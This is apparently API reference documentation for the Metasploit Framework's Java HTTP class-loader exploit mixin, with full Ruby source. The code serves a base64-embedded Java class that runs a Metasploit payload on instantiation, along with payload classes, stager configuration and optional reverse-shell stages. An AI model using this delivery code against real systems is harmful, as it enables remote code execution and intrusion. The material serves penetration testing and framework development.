Module: Msf::Exploit::Remote::Java::HTTP::ClassLoader

Includes:
HttpServer
Defined in:
lib/msf/core/exploit/remote/java/http/class_loader.rb

Instance Attribute Summary

Attributes included from SocketServer

#service

Instance Method Summary

Methods included from HttpServer

#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version

Methods included from SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #via_string

Instance Method Details

#class_name ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 124

def class_name
  # Random, capitalised alphabetic Java class name (8..42 characters).
  # Memoised so every stage (URL whitelist, bytecode patching) sees the
  # same name for the lifetime of the module instance.
  return @class_name if @class_name

  @class_name = rand_text_alpha(8..42).capitalize
end

#constructor_class ⇒ Object

// Source form of the class file that #constructor_class embeds as base64.
// Instantiating it runs metasploit.Payload.main(null) from the constructor
// and swallows any Exception; the "Metasploit" name in the compiled constant
// pool is replaced at serve time with the random #class_name.
import metasploit.Payload;

public class Metasploit {
  public Metasploit() {
    try {
      Payload.main(null);
    }
    catch (Exception e) {}
  }
}


# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 108

def constructor_class
  # Compiled form of the small Metasploit.class shown in this method's docs:
  # its constructor calls metasploit.Payload.main(). The embedded class name
  # is swapped for the random #class_name so the served bytes match the URL
  # the target asked for.
  encoded = <<~EOF
    yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN
    U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u
    AQAKTWV0YXNwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQB
    AARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgA
    AAA3AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgAB
    BwALAAAA
  EOF
  bytecode = Rex::Text.decode_base64(encoded)

  # The class name lives in a length-prefixed (big-endian u2) constant-pool
  # entry: "Metasploit" is 10 bytes, hence the \x00\x0a prefix. A String
  # pattern makes this a literal (non-regex) replacement of the first match.
  bytecode.sub("\x00\x0aMetasploit", packed_class_name)
end

#initialize(info = {}) ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 12

def initialize(info = {})
  # Every module built on this mixin is forced to the Aggressive stance
  # (it serves the loader classes from its own HTTP server, see HttpServer).
  #
  # @param info [Hash] module metadata, extended with the forced stance
  stance_info = update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive)
  super(stance_info)
end

#on_request_uri(cli, request) ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 37

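def on_request_uri(cli, request)
  # Serve the class-loader stages over HTTP. Only HEAD and GET are honoured;
  # any other method is logged and ignored (no response is written).
  #
  # @param cli [Object] the client connection, passed through to the send_* helpers
  # @param request [Object] the parsed HTTP request (#method, #uri, #raw_uri)
  # @return [Object, nil] the send_* helper's result, or nil for ignored methods
  vprint_status("#{request.method} #{request.uri} requested")

  unless %w[HEAD GET].include?(request.method)
    vprint_error("Ignoring #{request.method} request")
    return
  end

  # Everything after our base URI, exactly as the client sent it. This is
  # untrusted input and is later interpolated into a MetasploitPayloads path,
  # so the matching below must be exact.
  resource = request.raw_uri.delete_prefix(resource_uri)

  if request.method == 'HEAD'
    # NOTE(review): this whitelist does not list the optional stage 4 classes
    # served by GET below, so a HEAD probe for those is answered 404 while the
    # matching GET succeeds; kept as-is in case that asymmetry is intended.
    whitelist = %W[
      #{class_name}.class
      metasploit/Payload.class
      metasploit.dat
    ]

    unless whitelist.include?(resource)
      vprint_error('Sending 404')
      return send_not_found(cli)
    end

    vprint_good('Sending 200')
    return send_response(cli, '')
  end

  case resource
  # Stage 1
  when "#{class_name}.class"
    vprint_good('Sending the constructor class')
    # This contains the constructor that will call our JavaPayload
    res = constructor_class
  # Stage 2
  when 'metasploit/Payload.class'
    vprint_good('Sending the main payload class')
    # This is our JavaPayload as a compiled class
    res = MetasploitPayloads.read('java/metasploit/Payload.class')
  # Stage 3
  when 'metasploit.dat'
    vprint_good('Sending the payload configuration data')
    # This tells the target how to address the payload; this is the magic!
    res = payload_instance.stager_config
  # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp
  # Anchored with \A and \z rather than ^ and $: the latter match per line, so
  # a resource carrying a newline could satisfy the pattern while still
  # contributing arbitrary extra path segments to the read below.
  when %r{\Ajavapayload/stage/(?:Shell|Stage|StreamForwarder)\.class\z}
    vprint_good("Sending additional payload class: #{resource}")
    res = MetasploitPayloads.read("java/#{resource}")
  else
    vprint_error('Sending 404')
    return send_not_found(cli)
  end

  send_response(
    cli,
    res,
    # file -I says application/x-java-applet, but I don't believe it
    'Content-Type' => 'application/octet-stream'
  )
end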

#packed_class_name ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 128

def packed_class_name
  # #class_name laid out like the constant-pool entry it replaces: a two-byte
  # big-endian length followed by the name itself (cf. "\x00\x0aMetasploit"
  # in #constructor_class).
  name = class_name
  length_prefix = [name.length].pack('n')
  "#{length_prefix}#{name}"
end

#resource_uri ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 29

def resource_uri
  # Base URI the stages are served under, cached after the first call.
  # Class loading only works when this path ends in '/', so one is appended
  # to whatever the parent implementation returns if it is missing.
  @resource_uri ||= begin
    base = super
    base.end_with?('/') ? base : "#{base}/"
  end
end

#start_service(opts = {}) ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 18

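def start_service(opts = {})
  # Start the HTTP server with SSL forced off, restore the datastore value,
  # and return the URI the loader classes are served from.
  #
  # @param opts [Hash] passed straight through to the parent start_service
  # @return [Object] the result of #get_uri
  #
  # XXX: This is a workaround until we can take SSL in opts. The original
  # value is put back in an ensure block so that a failure inside super does
  # not leave the module's datastore with SSL permanently disabled.
  ssl = datastore['SSL']
  datastore['SSL'] = false

  begin
    super
  ensure
    datastore['SSL'] = ssl
  end

  get_uri
end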